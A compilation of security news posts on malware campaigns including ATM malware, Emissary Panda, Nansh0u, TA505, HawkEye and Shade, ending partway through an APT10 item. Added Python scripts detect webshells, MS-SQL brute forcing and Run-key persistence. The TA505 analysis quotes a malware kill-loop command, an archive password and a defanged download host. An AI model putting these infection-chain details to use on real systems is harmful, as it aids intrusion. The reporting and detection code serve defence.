ATM malware has since evolved into a number of different families with different actors behind them, ranging from criminal groups to actors affiliated with nation states. The significance of ATM malware stems from the fact that it can bring significant financial gains to attackers and, as a consequence, cause significant damage to targeted banks, financial institutions and end users.

Now that this type of malware has been around for more than 10 years, we wanted to round up the specific families we’ve seen during that time and attempt to find out if the different families share any code.


The post 10 years of virtual dynamite: A high-level retrospective of ATM malware appeared first on Cisco Blog.

Smashing Security #130: Doctored videos, BCC blunders, and a diva

You won’t believe who had to report themselves to the data protection agency for a breach, or who has been sharing doctored videos of political rivals, or how much money you can make selling a laptop infected with malware… and how Carole gets her diva on.

All this and much more is discussed in the latest edition of the award-winning “Smashing Security” podcast by computer security veterans Graham Cluley and Carole Theriault, who aren’t joined by a guest this week.

Emissary Panda APT group hit Government Organizations in the Middle East

Chinese Cyber-Spies Target Government Organizations in Middle East

Chinese APT group Emissary Panda has been targeting government organizations in two different countries in the Middle East.

Experts at Palo Alto Networks reported that the Chinese APT group Emissary Panda (aka APT27, TG-3390, Bronze Union, and Lucky Mouse) has been targeting government organizations in two different countries in the Middle East.

The Emissary Panda APT group has been active since 2010 and has targeted organizations worldwide, including U.S. defense contractors, financial services firms, and a national data center in Central Asia.


The group was involved in cyber espionage campaigns aimed at new-generation weapons and in surveillance of dissidents and other civilian groups.

The cyber espionage group leverages both readily available tools and custom malware in its operations; many of these tools have been available for years, but in recent attacks their code was updated.

In April 2019, the group targeted organizations in two different countries in the Middle East. The attackers compromised SharePoint servers by exploiting the CVE-2019-0604 vulnerability and used that access to install webshells on them.

Once inside the network, the attackers uploaded a variety of tools to perform additional activities, including dumping credentials and locating and pivoting to additional systems on the network.

Experts pointed out that the attackers used tools to scan the network for systems vulnerable to CVE-2017-0144, the SMB flaw exploited by the NSA-linked EternalBlue exploit.

The campaign appears related to attacks exploiting CVE-2019-0604 reported by the Saudi Arabian National Cyber Security Center and the Canadian Centre for Cyber Security. The Saudi report suggests the threat actors are primarily targeting organizations within the kingdom; the Canadian report describes similar attacks aimed at delivering the China Chopper webshell to ensure persistence in the target networks.

“[T]he actors used these webshells to upload legitimate executables that they would use DLL sideloading to run a malicious DLL that has code overlaps with known Emissary Panda attacks. We also found the China Chopper webshell on the SharePoint servers, which has also been used by the Emissary Panda threat group,” states the report published by Palo Alto Networks.

Between April 1 and April 16, Palo Alto Networks experts observed the threat actors using webshells to upload 24 unique executables to three SharePoint servers hosted by two different government organizations. The same tools were uploaded through all three webshells, suggesting the involvement of the same attacker.

The longest activity involving one of the three webshells was observed on April 16, 2019.

The list of tools uploaded by the cyberspies included legitimate applications such as cURL, post-exploitation tools like Mimikatz, tools to scan for and exploit vulnerabilities in the target network, and custom backdoors such as HyperBro, which Emissary Panda has used in the past.

One of the webshells used by the attackers is a variant of the Antak webshell; the others appear related to the China Chopper webshell.

“We were able to gather one of the webshells with which we saw the actor interacting, specifically the error2.aspx file listed above. The error2.aspx file (SHA256: 006569f0a7e501e58fe15a4323eedc08f9865239131b28dc5f95f750b4767b38) is a variant of the Antak webshell, which is part of a tool created for red teaming called Nishang,” continues the report.

Experts also uncovered the use of additional sideloaded DLLs in this campaign.

“The Emissary Panda threat group loaded the China Chopper webshell onto SharePoint servers at two Government organizations in the Middle East, which we believe with high confidence involved exploiting a remote code execution vulnerability in SharePoint tracked in CVE-2019-0604,” Palo Alto Networks concludes. 

“Once the adversary established a foothold on the targeted network, they used China Chopper and other webshells to upload additional tools to the SharePoint server to dump credentials, perform network reconnaissance and pivot to other systems.”
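The post describes webshells on SharePoint that the operators drove by uploading tools and dumping credentials. One way to hunt for that activity in the server's own IIS logs, written as an added example for this page rather than code from Palo Alto Networks or the Security Affairs post: a webshell is typically only ever POSTed to, by one or two operator addresses, and is never fetched with GET by ordinary users, whereas legitimate SharePoint pages are requested by many clients. That heuristic, the `/_layouts/15/` location, the client addresses and the log lines themselves are assumptions constructed for the example; only the `error2.aspx` name comes from the report.

```python
"""Hunt for webshell activity in IIS W3C logs exported from a SharePoint server.

Heuristic (an assumption of this example, not a rule from the report): a
webshell is driven by POST requests from one or two operator addresses and is
never fetched via GET by ordinary users, whereas legitimate SharePoint pages
are requested by many clients.
"""
from collections import defaultdict

# Field order assumed for logs that carry no #Fields directive; the directive,
# when present in the file, overrides it.
DEFAULT_FIELDS = [
    "date", "time", "s-ip", "cs-method", "cs-uri-stem", "cs-uri-query",
    "s-port", "cs-username", "c-ip", "cs(User-Agent)", "cs(Referer)",
    "sc-status", "sc-substatus", "sc-win32-status", "time-taken",
]

# Constructed sample traffic (not real log data). The /_layouts/15/ location
# and the client addresses are assumptions for the example.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2019-04-02 08:01:10 10.0.0.5 GET /SitePages/Home.aspx - 443 CORP\\alice 10.0.1.20 Mozilla/5.0 - 200 0 0 120
2019-04-02 08:01:12 10.0.0.5 GET /_layouts/15/start.aspx - 443 CORP\\bob 10.0.1.21 Mozilla/5.0 - 200 0 0 88
2019-04-02 08:02:30 10.0.0.5 POST /_layouts/15/start.aspx - 443 CORP\\bob 10.0.1.21 Mozilla/5.0 - 200 0 0 95
2019-04-02 08:03:01 10.0.0.5 POST /_layouts/15/error2.aspx - 443 - 203.0.113.7 Mozilla/4.0+(compatible;+MSIE+6.0) - 200 0 0 31
2019-04-02 08:03:04 10.0.0.5 POST /_layouts/15/error2.aspx - 443 - 203.0.113.7 Mozilla/4.0+(compatible;+MSIE+6.0) - 200 0 0 40
2019-04-02 08:05:22 10.0.0.5 POST /_layouts/15/error2.aspx - 443 - 203.0.113.7 Mozilla/4.0+(compatible;+MSIE+6.0) - 200 0 0 37
2019-04-02 08:06:00 10.0.0.5 GET /SitePages/Home.aspx - 443 CORP\\carol 10.0.1.22 Mozilla/5.0 - 200 0 0 101
"""


def parse_iis_log(text):
    """Yield one dict per request line, keyed by the W3C field names."""
    fields = DEFAULT_FIELDS
    for line in text.splitlines():
        if not line.strip():
            continue
        if line.startswith("#Fields:"):
            fields = line.split()[1:]      # the log's own field order wins
            continue
        if line.startswith("#"):
            continue
        parts = line.split()
        if len(parts) != len(fields):
            continue                       # malformed line: skip, never guess
        yield dict(zip(fields, parts))


def find_webshell_candidates(text, min_posts=3, max_post_clients=2):
    """Return .aspx paths that are only POSTed to, by few clients, never GET-fetched."""
    get_clients, post_clients = defaultdict(set), defaultdict(set)
    post_count, post_agents = defaultdict(int), defaultdict(set)
    for req in parse_iis_log(text):
        stem = req["cs-uri-stem"].lower()
        if not stem.endswith(".aspx"):
            continue
        if req["cs-method"] == "GET":
            get_clients[stem].add(req["c-ip"])
        elif req["cs-method"] == "POST":
            post_clients[stem].add(req["c-ip"])
            post_count[stem] += 1
            post_agents[stem].add(req["cs(User-Agent)"])
    hits = []
    for stem, n in post_count.items():
        if n >= min_posts and not get_clients[stem] and len(post_clients[stem]) <= max_post_clients:
            hits.append({
                "path": stem,
                "posts": n,
                "clients": sorted(post_clients[stem]),
                "user_agents": sorted(post_agents[stem]),   # reported for triage only
            })
    return sorted(hits, key=lambda h: h["posts"], reverse=True)


if __name__ == "__main__":
    for hit in find_webshell_candidates(SAMPLE_LOG):
        print(hit)
```

Run it against the real `u_ex*.log` files instead of `SAMPLE_LOG`, and treat a hit as a lead to confirm by hashing the file on disk (the report's SHA256 for `error2.aspx` is given above), not as proof on its own: a custom page that is only ever submitted to, by a single internal address, looks the same in the log.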

If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – cyberespionage, Emissary Panda)

The post Emissary Panda APT group hit Government Organizations in the Middle East appeared first on Security Affairs.

Nansh0u campaign already infected 50,000 MS-SQL and PHPMyAdmin Servers

Guardicore Labs uncovered a widespread cryptojacking campaign tracked as Nansh0u and aimed at Windows MS-SQL and PHPMyAdmin servers.

Security experts at Guardicore Labs uncovered a widespread cryptojacking campaign leveraging a malware dubbed Nansh0u. The malicious code aimed at Windows MS-SQL and PHPMyAdmin servers worldwide.

According to the experts, the campaign is being carried out by China-based attackers.

According to the experts, Nansh0u has already infected over 50,000 servers worldwide. The threat actors also deployed a sophisticated kernel-mode rootkit on compromised systems to prevent the malware from being terminated.

“During the past two months, the Guardicore Labs team has been closely following a China-based campaign which aimed to infect Windows MS-SQL and PHPMyAdmin servers worldwide.” reads the report published by Guardicore.

“Breached machines include over 50,000 servers belonging to companies in the healthcare, telecommunications, media and IT sectors. Once compromised, the targeted servers were infected with malicious payloads. These, in turn, dropped a crypto-miner and installed a sophisticated kernel-mode rootkit to prevent the malware from being terminated.”

The attacks date back to February 26; the experts observed over seven hundred new victims per day. Researchers discovered 20 versions of the malicious payloads, with new payloads created at least once a week and put into use in the campaign immediately after their creation.


The threat actors launch brute-force attacks against previously identified Windows MS-SQL and PHPMyAdmin servers that are exposed online.

Once successfully logged in with administrative privileges, the threat actors execute a sequence of MS-SQL commands that download the malicious payload from a remote file server and execute it with SYSTEM privileges.

The attackers used two exploits, named apexp.exe and apexp2012.exe, that trigger the privilege escalation vulnerability CVE-2014-4113. The exploits allow running any executable with SYSTEM privileges.

“Using this Windows privilege, the attacking exploit injects code into the winlogon process. The injected code creates a new process which inherits winlogon's SYSTEM privileges, providing equivalent permissions as the prior version.” continues the analysis.
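The chain above starts with a password brute force against an exposed MS-SQL login and only becomes dangerous when one of those attempts succeeds. The following is an added example for this page, not Guardicore's check script, that reads SQL Server ERRORLOG text and raises two alerts: repeated failures for one login from one client inside a time window, and a successful login from a client that had just been failing. The log excerpt is constructed for the example; the line layout matches what SQL Server writes for login auditing. Note that “Login succeeded” lines are only written when login auditing is set to record both failed and successful logins (the default records failures only), so on a default install the second rule cannot fire.

```python
"""Flag MS-SQL login brute forcing and, more importantly, the success that follows it.

Input is SQL Server ERRORLOG text. 'Login succeeded' lines only appear when login
auditing records both failed and successful logins; with the default (failed
only) the first rule still fires, the second cannot.
"""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

LOGON_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2})\.\d+\s+Logon\s+"
    r"Login (?P<outcome>failed|succeeded) for user '(?P<user>[^']+)'.*"
    r"\[CLIENT: (?P<client>[^\]]+)\]"
)

# Constructed ERRORLOG excerpt (not from the report): six failures for 'sa' from
# one address in under two minutes, then a success; one ordinary typo by 'app'.
SAMPLE_ERRORLOG = """\
2019-02-26 03:14:07.11 Logon       Error: 18456, Severity: 14, State: 8.
2019-02-26 03:14:07.11 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 198.51.100.23]
2019-02-26 03:14:09.40 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 198.51.100.23]
2019-02-26 03:14:11.02 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 198.51.100.23]
2019-02-26 03:14:13.77 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 198.51.100.23]
2019-02-26 03:14:15.19 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 198.51.100.23]
2019-02-26 03:14:17.60 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 198.51.100.23]
2019-02-26 03:15:02.33 Logon       Login failed for user 'app'. Reason: Password did not match that for the login provided. [CLIENT: 10.0.0.8]
2019-02-26 03:15:10.05 Logon       Login succeeded for user 'app'. Connection made using SQL Server authentication. [CLIENT: 10.0.0.8]
2019-02-26 03:15:44.90 Logon       Login succeeded for user 'sa'. Connection made using SQL Server authentication. [CLIENT: 198.51.100.23]
"""


def parse_logon_events(text):
    """Yield (timestamp, outcome, user, client) for each audited login line."""
    for line in text.splitlines():
        m = LOGON_RE.match(line)
        if m:
            yield (datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S"),
                   m["outcome"], m["user"], m["client"])


def detect_bruteforce(text, window=timedelta(minutes=10), threshold=5,
                      min_failures_before_success=3):
    """Sliding-window failure counter per (client, login); a success that follows
    several recent failures from the same client is the alert that matters most."""
    recent = defaultdict(deque)     # (client, user) -> failure timestamps inside window
    alerted = set()                 # keys already reported as brute force
    alerts = []
    for ts, outcome, user, client in parse_logon_events(text):
        key = (client, user)
        q = recent[key]
        while q and ts - q[0] > window:
            q.popleft()             # drop failures that fell out of the window
        if outcome == "failed":
            q.append(ts)
            if len(q) >= threshold and key not in alerted:
                alerted.add(key)
                alerts.append({"kind": "bruteforce", "client": client, "user": user,
                               "failures": len(q), "at": ts})
        else:
            if len(q) >= min_failures_before_success:
                alerts.append({"kind": "success_after_failures", "client": client,
                               "user": user, "failures": len(q), "at": ts})
            q.clear()               # a success resets the window for that key
    return alerts


if __name__ == "__main__":
    for alert in detect_bruteforce(SAMPLE_ERRORLOG):
        print(alert)
```

The `Error: 18456` line that precedes each failure carries the state code and is deliberately not matched; the `Login failed` line that follows it has the client address, which is what the per-source counting needs.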

The payloads used in this campaign were droppers used to deliver a cryptocurrency miner to mine TurtleCoin cryptocurrency.

Experts observed many payloads dropping a kernel-mode driver with random file names into AppData/Local/Temp. The compile time of these files suggests they were created in 2016, but most AV engines still do not detect them as malicious.

The driver carried a digital signature issued by the certificate authority Verisign.

“We can confidently say that this campaign has been operated by Chinese attackers. We base this hypothesis on the following observations:

  • The attacker chose to write their tools with EPL, a Chinese-based programming language.
  • Some of the file servers deployed for this campaign are HFSs in Chinese.
  • Many log files and binaries on the servers included Chinese strings, such as 结果-去重复 (“duplicates removed”) in logs containing breached machines, or 开始 (“start”) in the name of the script initiating port scans,” concludes the report.

Experts also published a list of IoCs (indicators of compromise) and a free PowerShell-based script that could be used by Windows admins to check whether their systems are infected or not.


Pierluigi Paganini

(SecurityAffairs – nansh0u malware, hacking)

The post Nansh0u campaign already infected 50,000 MS-SQL and PHPMyAdmin Servers appeared first on Security Affairs.

When it comes to email-based threats, Emotet dominates

Emotet displaced credential stealers, stand-alone downloaders and RATs and became the most prominent threat delivered via email, Proofpoint has shared. According to the firm's statistics, in Q1 2019 a whopping 61 percent of all malicious payloads distributed via email were Emotet.

The nature of the malicious payloads

Emotet started its life as a banking Trojan, but has morphed over time into a malware multi-tool, capable of downloading additional malware, stealing passwords, performing brute-force attacks …

The post When it comes to email-based threats, Emotet dominates appeared first on Help Net Security.

TA505 is expanding its operations

An attack against an Italian organization led the experts at Yoroi-Cybaze ZLab to shed light on ongoing operations attributed to TA505.


In the last few days, during monitoring activities, Yoroi CERT noticed a suspicious attack against an Italian organization. The malicious email contained a highly suspicious sample, which triggered the ZLAB team to investigate its capabilities and possible attribution, discovering a potential expansion of the TA505 operation. The threat group is known for its recent attack campaigns against the banking and retail sectors, but the latest evidence indicates a potential expansion of its criminal operations to other industries too.

Technical Analysis

Brief Description: Excel file with malicious macro
Ssdeep: 3072:Mc38TehYTdeHVhjqabWHLtyeGxml8/dgzxXYhh3vVYwrq8/P5HKuPF1+bkm13Kkf:B38TehYTdeHVhjqabWHLty/xml8/dgNr

Table 1. Information about initial dropper

The intercepted attack starts with a spear-phishing email embedding a spreadsheet. The document is weaponized with malicious macro code, triggered when the user opens the document to see the content hidden behind the obfuscated view.

Figure 1. XLS document

To understand its capabilities, the macro code was isolated and analyzed in detail. Part of the macro's content is shown in the following figure.

Figure 2. Part of extracted macro

Surprisingly, the source code consists of more than 1600 lines and is highly obfuscated. A closer look revealed that it is full of junk instructions that declare and initialize variables which are never used, as shown in Figure 2. Only a small portion of the code actually starts the infection; the rest is junk.

Figure 3. Example of junk instructions used in macro

Once the macro is executed, the malware downloads two files from “kentona[.]su” over an SSL-encrypted connection and stores them in the “C:\Users\Public” path: “rtegre.exe” and “wprgxyeqd79.exe”.

Brief Description: Trojan/Downloader (Executable file)
Ssdeep: 12288:3gL3qJxG5hfNV6oYYbDRcY4KhbmwPMCchbjBxwhrVmHAyzNkyRJK7hRMCQ:3mqkhfzYZY4kmgsbdm2HAENk0K7Dm

Table 2. Information about “rtegre.exe” downloaded from “kentona[.]su”

Brief Description: SFX (self-extracting archive) (Executable file)
Ssdeep: 49152:sIWB74MncmEWy4i1LkjoAwG2PI/mfqtftvMKcr+7Ao95xQW1vB38PELaacVzWTV3:sICtHsJoMAwG

Table 3. Information about “wprgxyeqd79.exe” (SFX) downloaded from “kentona[.]su”

Figure 4. Files contained in “wprgxyeqd79.exe” (SFX)

The “wprgxyeqd79.exe” sample is actually a self-extracting archive (SFX/SFA) containing four files that are extracted to the %TEMP% folder. It then executes “exit.exe”, which launches the “i.cmd” batch script.

Figure 5. “i.cmd” script contained in “pasmmm.exe”

This script pings “www[.]cloudflare[.]com” three times with a delay of 3000 ms to test the connectivity of the victim machine. If the host is reached, the script renames a file named “kernel.dll” (obviously not the real one) to “uninstall.exe”, another misleading name. Then it runs the renamed executable with a series of parameters: “uninstall.exe x -pQELRatcwbU2EJ5 -y”.

These parameters are needed to decrypt and extract the “uninstall.exe” file, which is yet another SFX archive: the “-p” parameter specifies the password of the archive to be extracted. The crucial file at this point of the infection is this SFX executable. It has a structure similar to the previous “wprgxyeqd79.exe” file (two of the contained files have the same names), but the content of this new SFX is extracted to the “%ALLUSERSPROFILE%\Windows Anytime Upgrade” directory.

Figure 6. Files contained in “uninstall.exe” (SFX)

Once again, the execution flow moves from “exit.exe” to “i.cmd”. This script is quite different from the previous one: it guarantees persistence on the victim machine by creating a new entry named “Windows Anytime Upgrade” under the “HKCU\Software\Microsoft\Windows\CurrentVersion\Run” registry key, pointing to “winserv.exe”, stored in the same folder. The script then runs “winserv.exe”.

Figure 7. “i.cmd” script contained in “uninstall.exe”

An interesting part of the script is the continuous killing of every “rundll32.exe” process running on the victim machine, which generates a huge amount of noise, as visible in the following Process Explorer view.

taskkill /f /im “rundll32.exe” || goto :Repeat

Figure 8. List of malware’s processes

Anyway, just before the kill loop, the real malicious payload is executed: the “winserv.exe” file. Analyzing it in depth, we discovered it is actually the RMS (Remote Manipulator System) client by TektonIT, packed with the MPress PE compressor, a legitimate tool, to avoid antivirus detection.

Figure 9. Information about MPress packer used in “winserv.exe” payload

TektonIT RMS is a remote administration tool, which gives the attacker complete access to the victim machine. Alongside the RMS executable there is another file named “settings.dat” containing the custom configuration prepared by the attacker. It contains information such as:

  • Server address and port the client will connect to
  • The password chosen by the attacker for the remote access
  • The ID associated with the victim client

All this information is automatically loaded by the RMS executable and initially stored in the registry key “HKCU\Software\tektonik\Remote MANIPULATOR System\Host\parameters”. At the next startup, the software loads the configuration directly from the newly created key.

Figure 10. Registry key set by “winserv.exe” (on the left); “settings.dat” file (on the right)
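Both the Run-key persistence and the RMS configuration described above leave traces under HKCU that can be collected with a single `reg export HKCU hkcu.reg` and examined offline. The script below is an added example for this page, not code from Yoroi; it parses the `.reg` export format, classifies Run entries by where their executable lives (shared drop locations such as ProgramData, Users\Public and Temp, which this chain uses, rank higher than per-user AppData, where legitimate software also lives) and reports whether the TektonIT RMS key is present. The sample export, the victim user name and the OneDrive entry are constructed; the default expansions for `%ALLUSERSPROFILE%` and friends are assumptions.

```python
"""Hunt a 'reg export' of HKCU for the Run-key persistence and RMS key artifacts.

On the host:  reg export HKCU hkcu.reg   (the file is UTF-16LE, open it with
encoding="utf-16"), then pass its text to hunt_reg_export().
"""

# Assumed default expansions for variables a Run value may contain literally.
ENV_DEFAULTS = {
    "%ALLUSERSPROFILE%": r"C:\ProgramData",
    "%PROGRAMDATA%": r"C:\ProgramData",
    "%PUBLIC%": r"C:\Users\Public",
    "%TEMP%": r"C:\Users\%USERNAME%\AppData\Local\Temp",
    "%TMP%": r"C:\Users\%USERNAME%\AppData\Local\Temp",
}
RUN_KEY = r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run"
RMS_KEY_FRAGMENT = r"\tektonik\remote manipulator system"

# Constructed export (not a real capture): one legitimate per-user Run entry
# and the persistence entry plus RMS key described in the analysis.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"OneDrive"="\"C:\\Users\\victim\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe\" /background"
"Windows Anytime Upgrade"="C:\\ProgramData\\Windows Anytime Upgrade\\winserv.exe"

[HKEY_CURRENT_USER\Software\tektonik\Remote MANIPULATOR System\Host\parameters]
"InternetId"=hex:31,32,33,34,35,36,37,38,39,30,31,32,33,34,35,36,37,38,39,30,\
  31,32
"Password"=hex:aa,bb,cc,dd
"""


def _unescape(s):
    """Undo .reg string escaping: a backslash makes the next character literal."""
    out, i = [], 0
    while i < len(s):
        if s[i] == "\\" and i + 1 < len(s):
            out.append(s[i + 1])
            i += 2
        else:
            out.append(s[i])
            i += 1
    return "".join(out)


def parse_reg_export(text):
    """Return {key_path: {value_name: data}}; hex:/dword: data is kept as raw text."""
    keys, current, pending = {}, None, ""
    for raw in text.splitlines():
        line = pending + raw.strip()
        pending = ""
        if not line or line.startswith(";") or line.startswith("Windows Registry Editor"):
            continue
        if line.endswith("\\"):            # hex data continues on the next line
            pending = line[:-1]
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys.setdefault(current, {})
            continue
        if current is None or "=" not in line:
            continue
        name, _, data = line.partition("=")   # value names containing '=' are not handled
        name = "(Default)" if name == "@" else _unescape(name.strip('"'))
        if data.startswith('"') and data.endswith('"'):
            data = _unescape(data[1:-1])
        keys[current][name] = data
    return keys


def _executable_from_command(cmd):
    """Pull the program path out of a Run value (quoted, or unquoted up to .exe)."""
    for var, val in ENV_DEFAULTS.items():
        cmd = cmd.replace(var, val).replace(var.lower(), val)
    cmd = cmd.strip()
    if cmd.startswith('"'):
        end = cmd.find('"', 1)
        return cmd[1:end] if end > 0 else cmd[1:]
    idx = cmd.lower().find(".exe")
    return cmd[: idx + 4] if idx >= 0 else cmd.split(" ")[0]


def _classify(path):
    p = path.lower()
    if any(frag in p for frag in ("\\programdata\\", "\\users\\public\\", "\\temp\\")):
        return "high"       # shared / world-writable drop locations used by this chain
    if "\\appdata\\" in p:
        return "review"     # per-user and writable, but legitimate software lives here too
    return None


def hunt_reg_export(text):
    keys = parse_reg_export(text)
    run_entries = []
    for name, cmd in keys.get(RUN_KEY, {}).items():
        exe = _executable_from_command(cmd)
        severity = _classify(exe)
        if severity:
            run_entries.append({"name": name, "exe": exe, "severity": severity})
    rms_keys = [k for k in keys if RMS_KEY_FRAGMENT in k.lower()]
    return {
        "run_entries": run_entries,
        "rms_present": bool(rms_keys),
        "rms_values": sorted(v for k in rms_keys for v in keys[k]),
    }


if __name__ == "__main__":
    print(hunt_reg_export(SAMPLE_REG))
```

The RMS key alone is not proof of compromise, since the same product is sold as a legitimate administration tool; what makes it actionable here is the pairing with a Run entry that launches `winserv.exe` from `%ALLUSERSPROFILE%\Windows Anytime Upgrade`, a directory no Windows feature installs into.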

The client establishes a new connection with the remote command and control server hosted on a Bulgarian host, part of a Virtual Dedicated Server subnet of AS21100, operated by ITL LLC.

Figure 11. C2’s parameters

The attack consists of a complex flow, summarized in the following scheme:

Figure 12. Complete infection chain

The TA505 Connection

After reconstructing the full infection chain, we noticed strong similarities with a recent spear-phishing campaign against an unspecified US retail company. That attack, as reported by CyberInt, leveraged a command and control server located in Germany related to the TA505 actor: a very active group involved in cybercriminal operations all around the world, threatening a wide range of high-profile companies, active since 2014.

Figure 13. Comparison between infection chains

The comparison of the infection chains reveals that in both cases the attacker used a pair of SFX stages to deploy the “RMS” software, a legitimate remote administration tool produced by the Russian company “TektonIT”. The tool grants the group remote access and full, direct control of the infected machine. Some code pieces are directly reused across the analyzed campaigns, such as the “i.cmd” and “exit.exe” files, while some new components have been introduced, for instance the “rtegre.exe” and “veter1605_MAPS_10cr0.exe” files.

During the analysis, we also noticed that the “veter1605_MAPS_10cr0.exe” file changed slightly run after run: a few hours after the initial discovery, the infection chain dropped it with different icons, a different suffix (from “cr0” to “cr24”) and a different prefix (from “veter1605_” to “veter2005_”). This may indicate that the campaign is still ongoing.


The TA505 group is one of the most active threat groups operating since 2014; it has traditionally targeted the banking and retail industries, as we recently documented in our analysis of the “Stealthy Email Stealer” part of their arsenal. The peculiarity of this recent attack wave is that it hit a company not strictly in the banking or retail sector, suggesting the threat group could be widening its operations.


Technical details, including IoCs and Yara Rules, are available in the analysis published in the Yoroi blog.

Pierluigi Paganini

(SecurityAffairs – TA505, hacking)

The post TA505 is expanding its operations appeared first on Security Affairs.

HawkEye Keylogger is involved in attacks against business users

Experts at IBM X-Force observed a new campaign involving the HawkEye keylogger in April and May 2019, aimed at business users.

Malware attacks leveraging a new variant of the HawkEye keylogger have been observed by experts at IBM X-Force. The malware has been under active development since at least 2013 and is offered for sale on various hacking forums as a keylogger and stealer that allows monitoring systems and exfiltrating information.

The latest variant, named HawkEye Reborn v9, appeared in the cybercrime underground in December 2018. The author sells it under a licensing model and also offers access to updates for specific periods of time.

“IBM X-Force researchers report an increase in HawkEye v9 keylogger infection campaigns targeting businesses around the world,” reads the analysis published by IBM X-Force. “In campaigns observed by X-Force in April and May 2019, the HawkEye malware focused on targeting business users, aiming to infect them with an advanced keylogging malware that can also download additional malware to their devices.”

In April 2019, the threat actors launched numerous campaigns against industries such as transportation and logistics, healthcare, import and export, marketing, agriculture, and others.

The attackers delivered the keylogger through malspam campaigns focused on business users. The messages pose as emails sent from a large bank in Spain, or as fake emails from legitimate companies or other financial institutions.

“X-Force researchers note that the infection process is based on a number of executable files that leverage malicious PowerShell scripts.” continues the post.

Experts noticed that the malspam campaign originated from Estonia, while infections were observed worldwide.

“A few campaigns X-Force analyzed in April and May 2019 show that the infrastructure the malspam came from is hosted on similar assets,” concludes IBM X-Force. “It is possible that HawkEye operators further pay for other services from the malware's vendor, or from another cybercrime vendor serving up spamming campaigns.”


Pierluigi Paganini

(SecurityAffairs – HawkEye, hacking)


The post HawkEye Keylogger is involved in attacks against business users appeared first on Security Affairs.

Shade Ransomware is very active outside of Russia and targets more English-speaking victims

Experts at Palo Alto Networks spotted new Shade ransomware campaigns targeting new countries, including the U.S. and Japan.

Researchers observed a new wave of Shade ransomware attacks against targets in several countries, including the US and Japan.

Shade is considered one of the most dangerous threats in the cybercrime scenario; it has been active at least since 2014, when a massive infection was observed in Russia. Shade infections increased during October 2018, kept a constant trend until the second half of December 2018, took a break around Christmas, and then resumed in mid-January 2019 at double the size.

“Our results indicate the majority of recent Shade executables have also targeted users outside of Russia,” reads the analysis published by Palo Alto Networks.

“In fact, our research shows that the top five countries affected by Shade ransomware are not Russia or nations of the former Soviet Union, they are the United States, Japan, India, Thailand, and Canada.”

Most of the victims belong to the high-tech, wholesale and education sectors.

Shade has been distributed through malspam campaigns and exploit kits; the experts pointed out that its executable (EXE) has remained “remarkably consistent” since its discovery in 2014.

Once a Windows system is infected with this ransomware, the malicious code sets the desktop background to announce the infection. The ransomware also drops 10 text files on the Desktop, named README1.txt through README10.txt.

“Attention! All the important files on your disks were encrypted. The details can be found in README.txt files which you can find on any of your disks.” reads the message left on the background.


The README.txt files include instructions to contact the crooks via an email address in order to receive information on how to make the payment.

The researchers noticed that all the malspam campaigns spreading Shade ransomware retrieved an executable file from a compromised server.

“By focusing on the executable in this chain of events, we can determine where Shade ransomware infection attempts have occurred.” continues the report.

“AutoFocus has a Shade ransomware tag that identifies any items associated with Shade,” explains Palo Alto Networks. “We searched on attempted deliveries of a Shade ransomware executable during an infection chain, and we focused our search on packed executable (PE) files sent through a URL over TCP port 80.”

Experts discovered that most of the URLs hosting Shade ransomware executables were reported from customer devices outside Russia and Russian-speaking countries.

Technical details, including Indicators of Compromise (IoCs) are reported in the analysis published by the experts.


Pierluigi Paganini

(SecurityAffairs – Shade, ransomware, malware)

The post Shade Ransomware is very active outside of Russia and targets more English-speaking victims appeared first on Security Affairs.

Digital Criminals Abusing Secure Tunneling Service to Deliver Lokibot

Digital criminals have begun abusing a secure tunneling service to deliver samples of the Lokibot banking malware family. My Online Security came across an instance of this campaign when they received an email pretending to come from BBVA Banco Continental, part of the Spanish BBVA banking group. The email leveraged the lure of a fake payment transfer to […]

The post Digital Criminals Abusing Secure Tunneling Service to Deliver Lokibot appeared first on The State of Security.

APT-27 like Newcore RAT, Virut exploiting MySQL for targeted attacks on enterprise

In today's world data is everything, and to store and process this large amount of data everyone uses computing devices. The application servers used to store this precious data include MySQL, MongoDB, MSSQL and others, but unfortunately few are conscious of their security. In…

APT10 is back with two new loaders and new versions of known payloads

The APT10 group has added two new malware loaders to its arsenal and used them in attacks aimed at government and private organizations in Southeast Asia.

In April 2019, the China-linked cyber-espionage group tracked as APT10 added two new loaders to its arsenal and used them against government and private organizations in Southeast Asia.

The group has been active at least since 2009. In April 2017, experts from PwC UK and BAE Systems uncovered a widespread hacking campaign, tracked as Operation Cloud Hopper, targeting managed service providers (MSPs) in multiple countries worldwide.

In July 2018, FireEye observed a series of new attacks by the group leveraging spear-phishing emails with weaponized Word documents that attempted to deliver the UPPERCUT backdoor, also tracked as ANEL.

In September 2018, researchers from FireEye uncovered and blocked a campaign by the Chinese APT10 cyber espionage group aimed at the Japanese media sector.

The recent attacks were uncovered by experts at enSilo, who also noticed that the APT group used modified versions of known malware.

“Towards the end of April 2019, we tracked down what we believe to be new activity by APT10, a Chinese cyber espionage group.” reads the analysis published by enSilo. “Both of the loader’s variants and their various payloads that we analyzed share similar Tactics, Techniques, and Procedures (TTPs) and code associated with APT10.”

The two loaders deliver different payloads to the victims and both variants drop the following files beforehand:

